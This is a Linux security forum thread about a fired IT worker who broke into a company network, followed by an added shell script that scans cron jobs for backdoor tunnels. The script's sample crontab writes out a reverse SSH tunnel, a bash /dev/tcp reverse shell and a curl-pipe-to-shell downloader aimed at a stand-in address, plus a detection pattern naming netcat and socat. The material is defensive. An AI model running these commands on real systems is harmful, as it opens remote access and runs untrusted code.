Linux - Security
This forum is for all security-related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
I assume that means you want to set up a NAT/masquerading firewall? If not, please clarify what you mean by "mask our WAN IP". The reason I'm asking is that you've stated you are running a CentOS-based firewall, which sort of implies that you might already be doing NAT/masquerading. Also, if possible, please provide at least a basic overview of the intrusion you experienced, why "masking your WAN IP" would prevent it from happening again, and what your current network setup looks like.
Allow an East Tennessee hillbilly to attempt to translate into Western North Carolina hillbilly
There are several reasons we are asking about the nature of the attack, network layout, and so forth. Your goal of "masking the WAN IP" is terribly ambiguous, and sounds more like an excuse to use buzz words rather than an actual request. Your boss might as well ask you to reboot the Internet. Besides, when asking for help, it's usually better to describe the symptoms than to speculate wildly about a solution. The solution you seek may not be appropriate for the vulnerability that was exploited.
For instance, if the attack was a website defacement, then no amount of tweaking your firewall will plug the hole that allowed the SQL injection. If, on the other hand, the Windows machines behind your firewall got infected by a zombie botnet, that's a different solution as well (although blocking outbound IRC and P2P using a traffic shaper of some sort couldn't hurt).
If I were to interpret your boss's request literally (and it hurts my head to do so), I would say he's asking you to put a firewall in front of your firewall.
In the companies that I've worked with, the term WAN usually applies to a network that connects multiple sites or locations. The vast majority of these would be connected via routers using separate subnets.
If you are discussing Internet security on a firewall, that is another matter. The other posters are asking for more specifics so that they can help you with your issue. They aren't just giving you a hard time. To help, we would need at the very least what current firewall you are using, what the nature of the breach was, and a basic overview of your network.
True, the Internet is by definition a WAN - but you don't need the Internet to have a WAN, as pointed-out by javaroast. And as mentioned by calraith (and myself), the OP's description of the problem and the plan of action is quite vague. This is evidenced by this WAN discussion itself (we don't know what kind of WAN the OP means). Let's wait for the OP to get back to us with more information so that we may be able to better understand the situation and provide any necessary assistance.
Quote:
True, the Internet is by definition a WAN - but you don't need the Internet to have a WAN
True, but we need WANs to have the Internet... and that is true, but I'm just kidding.
I had to say that the Internet is a WAN because people often have misconceptions about that.
You're right, the OP should post more information.
Last edited by alan_ri; 06-26-2008 at 06:30 PM.
Reason: grammar
Original Poster:
Thank you everyone for your posts.
Here is some background:
1. The IT guy I replaced hacked into our network the weekend after he was fired and changed the time clock so his last paycheck would be increased (boss thinks he set up a backdoor).
2. I changed all passwords and searched log files, which he deleted after he got into our network.
3. My firewall experience prior to this job was a Watchguard 700, so I need help with Linux.
4. A friend of my boss told him his IT person changed his IP (masquerade?) among other measures and secured his network.
5. My boss has very limited knowledge of computers!
I am new at this job, and jobs are hard to find right now, so any help would be very much appreciated.
Replace that firewall IMMEDIATELY. Yank the WAN link now. There are MANY backdoors he could have put on it. The list is almost endless.
Since you are new to Linux, I suggest installing one of the free, simple Linux-based firewalls, such as Untangle. Just download the CD and boot it to install. They are very easy to install, configure and manage.
Quote:
Thank you everyone for your posts.
Here is some background:
1. The IT guy I replaced hacked into our network the weekend after he was fired and changed the time clock so his last paycheck would be increased (boss thinks he set up a backdoor).
Since this person thereby committed fraud, call the police. He also seems to have violated state and/or federal computer-crime statutes: call the police.
Quote:
2. I changed all passwords and searched log files, which he deleted after he got into our network.
3. My firewall experience prior to this job was a Watchguard 700, so I need help with Linux.
4. A friend of my boss told him his IT person changed his IP (masquerade?) among other measures and secured his network.
5. My boss has very limited knowledge of computers!
I am new at this job, and jobs are hard to find right now, so any help would be very much appreciated.
A firewall won't help you with someone who knew a password. If you changed all the passwords (login, database, everything), he probably can't get in anymore.
"A friend of my boss" probably does not have accurate information in this case; in fact, I think he or she doesn't. You are dealing with a "jilted-lover attack," the hardest kind.
Be sure to keep careful track of time since all of this might serve as actual-damages proof that might be helpful in adding a couple more years to the time this person could spend behind bars. No, I'm not kidding.
Quote:
If you changed all the passwords (login, database, everything), he probably can't get in anymore.
Sure he can. For example, he can have the CentOS box run a cron job that initiates a tunnel to his home box. There are lots of ways.
I would replace the firewall completely. Set it aside. Hell, go to the store and buy a cheap Linksys router/firewall, and use it for now. They are cheap, ~$50.
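What the cron-driven tunnel described above looks like, and how to hunt for it on the CentOS box before deciding whether anything on it can be trusted. This is an added example, not code from the thread or from any poster. The crontab it scans is constructed for illustration (the 203.0.113.0/24 addresses are documentation space, not anyone's real host), the regular expression is a review heuristic that flags lines for a human to read rather than proof of compromise, and a previous admin could just as easily have persisted through init scripts, /etc/rc.local, a SUID binary or a trojaned package, none of which this script covers.

```shell
#!/bin/sh
# Added example, not code from the thread: hunt for cron-driven reverse
# tunnels and other outbound "call-home" persistence on a CentOS firewall.
# Assumes only POSIX sh, grep -E, sed, wc and tr. Hosts and addresses below
# are constructed for illustration (203.0.113.0/24 is documentation space).

# Things that, inside a cron command, usually mean "open a channel outward":
#   ssh -R / -D / -w    reverse, dynamic or tun port forwarding
#   autossh             keeps such a tunnel alive across drops
#   nc/ncat/socat       raw connect-back shells
#   /dev/tcp/           bash's built-in network redirection (classic reverse shell)
#   curl|wget ... | sh  download-and-run droppers
#   bash -i, python -c  interactive or scripted reverse shells
# A hit means "a human must read this line", not "compromised".
SUSPICIOUS_RE='ssh[^#]*(-R|-D|-w )|autossh|(^|[^a-z])(nc|ncat|netcat|socat)([^a-z]|$)|/dev/tcp/|(curl|wget)[^|]*\|[^|]*(sh|bash)|bash -i|python[0-9.]* -c'

# scan_cron_text: crontab text on stdin, suspicious lines on stdout.
# Comments, blank lines and environment assignments (SHELL=..., PATH=...) are skipped.
scan_cron_text() {
    grep -v -E '^[[:space:]]*(#|$)' \
      | grep -v -E '^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' \
      | grep -E -i "$SUSPICIOUS_RE"
}

# count_suspicious: how many lines were flagged (0 when the input is clean).
count_suspicious() {
    scan_cron_text | wc -l | tr -d ' '
}

# audit_live_host: the same scan over every cron source on a real box, plus
# a look at established outbound sessions owned by tunnel-capable programs.
# Run as root; each finding is prefixed with the file it came from.
audit_live_host() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* \
             /etc/cron.hourly/* /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/*; do
        [ -f "$f" ] || continue
        # Scripts in the periodic directories are commands rather than crontab
        # lines, but the same patterns apply to their contents.
        scan_cron_text < "$f" | sed "s|^|$f: |"
    done
    # An active tunnel is an established outbound session; ss on newer systems,
    # netstat on older CentOS releases.
    if command -v ss >/dev/null 2>&1; then
        ss -tnp state established 2>/dev/null | grep -E '"(ssh|autossh|nc|ncat|socat)"' || true
    else
        netstat -tnp 2>/dev/null | grep -E 'ESTABLISHED.*/(ssh|autossh|nc|ncat|socat)' || true
    fi
}

# Constructed sample (not from the OP's box): two legitimate jobs next to
# three ways the previous admin could have had the firewall call home.
SAMPLE_CRONTAB='# constructed sample crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * root /usr/bin/ssh -N -f -R 2222:localhost:22 joe@203.0.113.10
@reboot root /bin/bash -c "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"
30 1 * * * root /usr/bin/curl -s http://203.0.113.10/u.sh | sh
0 * * * * root /usr/bin/rsync -a /var/log/ backup:/logs/'

# Stand-alone demo: prints the three planted lines and nothing else.
printf '%s\n' "$SAMPLE_CRONTAB" | scan_cron_text
```

On the real box, run `audit_live_host` as root and read every line it prints; a single hit on the firewall confirms the advice already given in this thread, which is to pull the WAN link and rebuild from a clean install rather than try to clean the box in place.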